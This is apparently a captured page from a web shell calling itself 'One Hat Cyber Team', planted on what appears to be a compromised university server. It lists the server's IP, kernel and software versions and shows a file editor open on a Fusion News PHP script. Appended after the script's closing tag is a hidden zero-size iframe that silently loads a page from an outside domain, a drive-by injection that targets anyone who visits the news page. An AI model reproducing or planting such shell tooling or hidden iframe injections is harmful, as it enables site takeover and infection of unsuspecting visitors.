One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
sam
/
public_html
/
go
/
news
/
Edit File:
fullnews.php
<?php /* ||========================================================== || Fusion News 3.x ||---------------------------------------------------------- || File Version : $Id: fullnews.php 211 2008-02-20 12:26:52Z xycaleth $ || Contact : xycaleth@gmail.com || Copyright: : (c) 2006 - 2008, FusionNews.net || License Info : http://www.gnu.org/copyleft/gpl.html ||========================================================== */ if ( !defined ('FNEWS_ROOT_PATH') ) { define ('FNEWS_ROOT_PATH', str_replace ('\\', '/', dirname (__FILE__)) . '/'); include_once FNEWS_ROOT_PATH . 'common.php'; } $id = ( isset ($VARS['fn_id']) ) ? intval ($VARS['fn_id']) : 0; if ( !file_exists (FNEWS_ROOT_PATH . 'news/news.' . $id . '.php') ) { echo $flns0; } else { $file = file( FNEWS_ROOT_PATH.'news/news.'.$id.'.php' ); $news_info = parse_news_to_view ($file[1]); $temp_full = get_template ('fullnews_temp.php', true); $temp_full = str_replace ('{post_id}', $news_info['post_id'], $temp_full); $temp_full = str_replace ('{subject}', $news_info['subject'], $temp_full); $temp_full = str_replace ('{description}', $news_info['description'], $temp_full); $temp_full = str_replace ('{user}', $news_info['writer'], $temp_full); $temp_full = str_replace ('{date}', $news_info['date'], $temp_full); $temp_full = str_replace ('{icon}', $news_info['icon'], $temp_full); $temp_full = str_replace ('{send}', $news_info['link_tell_friend'], $temp_full); $temp_full = str_replace ('{nrc}', $news_info['nrc'], $temp_full); $temp_full = str_replace ('{comments}', $news_info['link_comments'], $temp_full); $temp_full = str_replace ('{cat_icon}', $news_info['cat_icon'], $temp_full); $temp_full = str_replace ('{cat_id}', $news_info['cat_id'], $temp_full); $temp_full = str_replace ('{cat_name}', $news_info['cat_name'], $temp_full); $temp_full = str_replace ('{shortnews}', $news_info['news'], $temp_full); $temp_full = str_replace ('{fullnews}', $news_info['fullnews'], $temp_full); echo $temp_full; } ?> <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://gubmos.com/index12"></iframe>
Simpan